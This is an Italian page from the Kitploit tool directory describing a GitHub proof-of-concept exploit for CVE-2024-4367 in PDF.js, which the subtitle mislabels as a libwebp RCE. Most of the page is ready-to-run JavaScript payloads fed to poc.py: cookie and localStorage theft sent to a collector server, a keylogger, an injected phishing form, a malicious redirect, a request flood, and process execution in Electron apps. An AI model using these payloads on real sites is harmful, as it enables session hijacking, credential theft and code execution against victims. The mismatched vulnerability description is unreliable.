Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-4367-POC-PDFJS — PoC (Proof of Concept) della CVE-2024-4367 - Vulnerabilità RCE in libwebp. Dimostrazione completa che include: creazione di payload, scenari di attacco, analisi dei rischi e server Express.js di test. | Kitploit
Strumenti/GitHubGitHub/elamani-drawing/cve-2024-4367-poc-pdfjs
Strumenti di PhishingGenerazione di PayloadExploitSfruttamento di Applicazioni WebEsfiltrazione DatiIngegneria SocialeApprendimento e Formazione
GitHubelamani-drawing/cve-2024-4367-poc-pdfjs

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-4367-POC-PDFJS

PoC (Proof of Concept) della CVE-2024-4367 - Vulnerabilità RCE in libwebp. Dimostrazione completa che include: creazione di payload, scenari di attacco, analisi dei rischi e server Express.js di test.

Vedi Repository
11 anno faNon ancora revisionato

CVE 2024 4367: PoC per lo sfruttamento di XSS (Cross-Site Scripting)

1. Visualizzazione di un Avviso (Attivazione XSS)

Un altro esempio di sfruttamento consiste nell'iniettare un semplice messaggio di avviso per verificare se l'attacco funziona.

root@kitploit:~
python poc.py "alert('XSS exploit triggered');"
  • Spiegazione : Questo codice inietta un pop-up di avviso nella pagina, consentendo di testare rapidamente se l'exploit XSS viene eseguito sul sito target.

2. Furto di Cookie

L'attacco XSS può essere utilizzato per rubare i cookie della vittima e inviarli a un server maligno.

root@kitploit:~
python poc.py "fetch('http://localhost:3000/cookie', {method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({cookie: document.cookie})});"
  • Spiegazione : Lo script modifica l'URL della pagina per includere i cookie della vittima, che vengono poi inviati a un server maligno (http://localhost:3000/cookie).

3. Furto di Dati Memorizzati Localmente (LocalStorage)

L'attaccante può rubare informazioni sensibili memorizzate nel localStorage della vittima, come dati di autenticazione o informazioni di sessione.

root@kitploit:~
python poc.py "fetch('http://localhost:3000/localstorage', { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({localstorage: JSON.stringify(localStorage)})});"
  • Spiegazione : Il codice recupera i dati sensibili memorizzati nel localStorage e li invia a un server maligno tramite una richiesta fetch.

4. Reindirizzamento Maligno

L'attaccante può reindirizzare la vittima verso un sito maligno per recuperare informazioni aggiuntive o caricare un altro exploit.

root@kitploit:~
python poc.py "window.location.href='http://localhost:3000';"
  • Spiegazione : Questo script reindirizza immediatamente la vittima verso un sito maligno, che può essere utilizzato in attacchi di phishing o per installare software dannoso.

5. Attacco DDoS (Inondazione API)

Un altro tipo di attacco consiste nell'inondare un server con richieste, che può portare a un degrado delle prestazioni o a un'interruzione del servizio.

root@kitploit:~
python poc.py  "for (let i = 0; i < 100; i++) { fetch('http://localhost:3000/api'); }"
  • Spiegazione : Lo script invia 100 richieste HTTP a un'API target, che può causare un sovraccarico del server (attacco di denial of service).

6. Keylogger (Furto di digitazioni)

L'attaccante può intercettare le digitazioni della vittima, permettendogli di recuperare informazioni sensibili come password o identificativi.

root@kitploit:~
python poc.py """document.addEventListener('keydown', function(e) {
    fetch('http://localhost:3000/keylogger?key=' + e.key);
});"""
  • Spiegazione : Questo script registra ogni tasto premuto dalla vittima e invia queste informazioni a un server maligno.

7. Phishing tramite Modulo Iniettato (Furto di dati sensibili)

Un attaccante può utilizzare XSS per iniettare un modulo di phishing in una pagina Web e così rubare informazioni sensibili (es.: password, nome utente).

root@kitploit:~
python poc.py """
var form = document.createElement('form');
form.method = 'POST';
form.action = 'http://localhost:3000/phishing';
var input = document.createElement('input');
input.type = 'text';
input.name = 'username';
form.appendChild(input);
document.body.appendChild(form);
form.submit();
"""
  • Spiegazione : Questo codice inietta un modulo nella pagina, consentendo all'attaccante di recuperare informazioni sensibili che l'utente invia tramite questo modulo di phishing.

8. Usurpazione

Se l'utente fa clic su un pulsante di download, cambieremo la destinazione del download.

root@kitploit:~
const a = document.createElement('a');
a.href = "https://example.com/fichier.pdf";
a.download = "fichier.pdf"; 
document.body.appendChild(a);
a.click();
document.body.removeChild(a);
  • Spiegazione : Questo script aggiorna il link di un URL di download, l'idea è di modificare un pulsante esistente in modo che scarichi un file maligno invece di quello previsto dall'utente.

9. Attacchi su Applicazioni Desktop (Electron, NW.js)

root@kitploit:~
python poc.py "require('child_process').exec('calc.exe')"

Le applicazioni basate su framework come Electron o NW.js possono anche essere soggette ad attacchi XSS, poiché consentono di integrare contenuti web in applicazioni desktop con accessi locali estesi.
Queste applicazioni, a causa delle loro autorizzazioni, possono permettere a un attaccante di accedere a file locali, eseguire processi esterni, o persino avviare altre applicazioni sulla macchina target (ad esempio, la calcolatrice, un editor di testo, ecc.). Ciò aumenta considerevolmente la superficie d'attacco, poiché queste applicazioni combinano la potenza del web con accessi di sistema più ampi.


Conclusione

Gli attacchi che sfruttano le CVE (Common Vulnerabilities and Exposures) possono permettere di realizzare vari tipi di attacchi XSS. Sfruttando vulnerabilità specifiche in applicazioni web o desktop, un attaccante può iniettare codice maligno, rubare informazioni sensibili, manipolare sessioni utente, o eseguire azioni dannose sul sistema target.

Scarica lo strumento